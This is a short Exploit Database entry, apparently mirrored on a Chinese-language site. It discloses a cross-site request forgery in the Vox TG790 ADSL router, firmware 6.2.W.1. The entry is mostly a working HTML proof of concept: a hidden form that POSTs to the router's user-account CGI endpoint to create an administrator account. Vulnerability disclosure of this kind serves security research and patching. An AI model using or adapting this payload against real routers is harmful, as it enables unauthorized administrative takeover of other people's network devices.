Vox TG790 ADSL Router – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 20 阅读

• 作者： cakes
  日期： 2018-08-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45252/

• # Title: Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)
  # Author: Cakes
  # Exploit Date: 2018-08-01
  # Vendor: Vox Telecom
  # Link: https://www.vox.co.za/
  # Firmware Version: 6.2.W.1
  # CVE: N/A
  
  # Description
  # Due to improper session management low privilege users are able to create 
  # administrator accounts through a crafted POST request. 
  
  # PoC
  
  <html>
  <form action="https://TARGET/cgi/b/users/cfg/usraccedit/?be=0&l0=2&l1=9&tid=ADD_USER" method="POST">
  <input type="hidden" name="0" id="0" value="10">
  <input type="hidden" name="1" id="1" value="usrAccApply">
  <input type="hidden" name="34" id="34" value="LulzCakes">
  <input type="hidden" name="36" id="36" value="1">
  <input type="text" name="33" id="33" placeholder="Account Name">
  <br />
  <input type="text" name="31" id="31" value="Administrator">
  <br />
  <input type="submit" value="W00ts">
  </form>
  </html>